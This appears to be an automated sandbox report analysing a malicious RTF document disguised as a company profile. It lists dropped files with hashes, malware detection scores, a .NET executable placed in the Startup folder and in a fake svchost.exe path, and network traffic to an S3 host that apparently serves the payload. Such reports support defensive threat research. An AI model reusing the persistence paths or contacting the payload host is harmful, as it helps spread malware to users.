                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KWITJSS33AUNENZNHP1F.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P6I517PCOBHL4J9OQ9E0.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXTSKOASU3HTN9MNZWSX.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WPSOBZIDEVVPSMUD2QNK.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WW5Z4WAT6CR6JFY4TKYI.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YDKB60LKBB2QYZ2W32L3.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Process:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 41%, Browse
                                                  • Antivirus: Metadefender, Detection: 19%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Joe Sandbox View:
                                                  • Filename: PO5421-allignright.doc, Detection: malicious, Browse
                                                  • Filename: lsqtIv1jRK.exe, Detection: malicious, Browse
                                                  • Filename: 04052021paymentscancopy.doc, Detection: malicious, Browse
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................*".(.....*^..}.....(.......(.....*&.(......*".......*".(#....*Vs....($...t.........*....0................s......o.....*.0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.
                                                  C:\Users\user\Desktop\~$lignright_companyprofile.doc
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.431160061181642
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                  Malicious:false
                                                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                  C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                                  Process:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 19%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................*".(.....*^..}.....(.......(.....*&.(......*".......*".(#....*Vs....($...t.........*....0................s......o.....*.0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.

                                                  Static File Info

                                                  General

                                                  File type:Rich Text Format data, unknown version
                                                  Entropy (8bit):4.113991727574773
                                                  TrID:
                                                  • Rich Text Format (5005/1) 55.56%
                                                  • Rich Text Format (4004/1) 44.44%
                                                  File name:Allignright_companyprofile.doc
                                                  File size:2960089
                                                  MD5:5a0c6dd1f7bbc5272f2ced270e2d4d8a
                                                  SHA1:9f553e08793745277db8a0d3aa82a63b7526a28b
                                                  SHA256:fbc12470553e748b10dd0e1a15c6e28a1e777b626757349e46031f7e0608b8e6
                                                  SHA512:4719421697b111049062271caef40709f72e8b32b96b023af71626e5b6d209434bf0eebffdee844fe15e283fdce42ed93d311876818a123562b42c09efa14e6d
                                                  SSDEEP:24576:bs3sSY8fk9mx1nmyuWKNYEDgjfCHw/AMCTIujdqIcfQTWLgmQxKnZpqsmEuyF2w9:S
                                                  File Content Preview:{\rtf8130{\object90153381 90153381 \'' \objautlink92734161\:\objupdate1977406519774065 \objw6282\objh2274{\*\objdata692470 {{{{{{{{{{{{{{{{{{{{{{{{{{\bin000000000 {\*\objdata692470 } \printim209

                                                  File Icon

                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                  Static RTF Info

                                                  Objects

                                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                  0000000EBhno
                                                  1000000B0hno

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 4, 2021 20:31:09.644644976 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:09.848016024 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:09.848231077 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:09.848525047 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.051945925 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101667881 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101728916 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101777077 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101826906 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101826906 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.101875067 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.101876974 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101906061 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.101933002 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101941109 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.101990938 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.101990938 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.102032900 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.102066994 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.102086067 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.102092981 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.102129936 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.102152109 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.102185011 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.105278015 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.134949923 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.135090113 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305121899 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305355072 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305522919 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305546999 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305567980 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305589914 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305599928 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305613041 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305617094 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305634022 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305640936 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305656910 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305659056 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305680990 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305681944 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305701971 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305710077 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305723906 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305731058 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305746078 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305749893 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305768013 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305771112 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305789948 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305804014 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305808067 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305824041 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305830956 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305843115 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305854082 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305866003 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305876017 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305883884 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305897951 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305922985 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305941105 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.306634903 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.339422941 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.339483023 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.339622974 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507145882 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507178068 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507252932 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507297993 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507599115 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507623911 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507641077 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507658005 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507702112 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507719040 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507740021 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507744074 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507766008 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507785082 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507788897 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507816076 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507827997 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507848978 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507869959 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507891893 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507915974 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507922888 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507939100 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507961035 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.507982969 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.507983923 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508004904 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508028030 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508052111 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508074999 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508100033 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508102894 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508116007 CEST4916780192.168.2.2252.218.240.113

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 4, 2021 20:31:09.510771036 CEST5219753192.168.2.228.8.8.8
                                                  May 4, 2021 20:31:09.571837902 CEST53521978.8.8.8192.168.2.22
                                                  May 4, 2021 20:31:09.572257996 CEST5219753192.168.2.228.8.8.8
                                                  May 4, 2021 20:31:09.630546093 CEST53521978.8.8.8192.168.2.22
                                                  May 4, 2021 20:33:21.528346062 CEST5309953192.168.2.228.8.8.8
                                                  May 4, 2021 20:33:21.577101946 CEST53530998.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  May 4, 2021 20:31:09.510771036 CEST192.168.2.228.8.8.80x2c09Standard query (0)miolouno.s3-us-west-2.amazonaws.comA (IP address)IN (0x0001)
